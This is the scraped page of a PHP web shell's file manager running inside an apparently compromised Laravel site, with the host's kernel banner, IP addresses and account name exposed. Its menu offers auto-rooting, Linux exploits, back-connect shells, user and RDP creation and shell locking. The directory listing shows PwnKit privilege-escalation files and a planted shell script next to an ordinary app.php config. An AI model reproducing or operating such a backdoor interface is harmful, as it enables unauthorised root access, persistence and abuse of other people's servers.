Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.142
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo9.com /
bootstrap /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
app.php
4.76
KB
-rw-rw-r--
goat1.php
143.87
KB
-rw-r--r--
providers.php
64
B
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : app.php
<?php use Illuminate\Http\Request; use App\Http\Middleware\Installed; use App\Http\Middleware\VerifyEmail; use App\Http\Middleware\Authenticate; use Illuminate\Foundation\Application; use Illuminate\Database\QueryException; use App\Http\Middleware\ApiKeyMiddleware; use App\Http\Middleware\ProxyAuthorizationHeader; use Illuminate\Auth\Access\AuthorizationException; use Spatie\Permission\Middleware\RoleMiddleware; use Illuminate\Foundation\Configuration\Exceptions; use Illuminate\Foundation\Configuration\Middleware; use Spatie\Permission\Middleware\PermissionMiddleware; use Illuminate\Database\Eloquent\ModelNotFoundException; use Symfony\Component\HttpKernel\Exception\HttpException; use Spatie\Permission\Middleware\RoleOrPermissionMiddleware; use Symfony\Component\HttpKernel\Exception\NotFoundHttpException; use Symfony\Component\HttpKernel\Exception\MethodNotAllowedHttpException; return Application::configure(basePath: dirname(__DIR__)) ->withRouting( web: __DIR__ . '/../routes/web.php', api: __DIR__ . '/../routes/api.php', commands: __DIR__ . '/../routes/console.php', health: '/up', ) ->withMiddleware(function (Middleware $middleware): void { $middleware->prepend(ProxyAuthorizationHeader::class); $middleware->validateCsrfTokens( except: [ '/payment/sslcommerz/*', '/payment/paytm/*', '/payment/cashfree/*', '/payment/phonepe/*', '/payment/iyzico/*', '/payment/pesapal/*' ] ); $middleware->alias([ 'auth' => Authenticate::class, 'auth.basic' => \Illuminate\Auth\Middleware\AuthenticateWithBasicAuth::class, 'auth.session' => \Illuminate\Session\Middleware\AuthenticateSession::class, 'cache.headers' => \Illuminate\Http\Middleware\SetCacheHeaders::class, 'can' => \Illuminate\Auth\Middleware\Authorize::class, 'guest' => \App\Http\Middleware\RedirectIfAuthenticated::class, 'password.confirm' => \Illuminate\Auth\Middleware\RequirePassword::class, 'signed' => \App\Http\Middleware\ValidateSignature::class, 'throttle' => \Illuminate\Routing\Middleware\ThrottleRequests::class, 'verified' => \Illuminate\Auth\Middleware\EnsureEmailIsVerified::class, 'apiKey' => ApiKeyMiddleware::class, 'verify.api' => VerifyEmail::class, 'role' => RoleMiddleware::class, 'permission' => PermissionMiddleware::class, 'role_or_permission' => RoleOrPermissionMiddleware::class, 'localization' => \App\Http\Middleware\localization::class, 'installed' => Installed::class, ]); }) ->withExceptions(function (Exceptions $exceptions) { $exceptions->renderable(function (Throwable $e, Request $request) { if ($request->expectsJson()) { if ($e instanceof AuthorizationException) { return response()->json([ 'success' => false, 'message' => 'User does not have the right permissions.', ], 403); } if ($e instanceof ModelNotFoundException) { return response()->json([ 'success' => false, 'message' => 'No query results for model.', ], 404); } if ($e instanceof MethodNotAllowedHttpException) { return response()->json([ 'success' => false, 'message' => 'Method not supported for the route.', ], 405); } if ($e instanceof NotFoundHttpException) { return response()->json([ 'success' => false, 'message' => 'The specified URL cannot be found.', ], 404); } if ($e instanceof HttpException) { return response()->json([ 'success' => false, 'message' => $e->getMessage() ?: 'HTTP error.', ], $e->getStatusCode()); } if ($e instanceof QueryException) { return response()->json([ 'success' => false, 'message' => 'A database error occurred.', 'error' => config('app.debug') ? $e->getMessage() : null, ], 422); } } }); })->create();
Close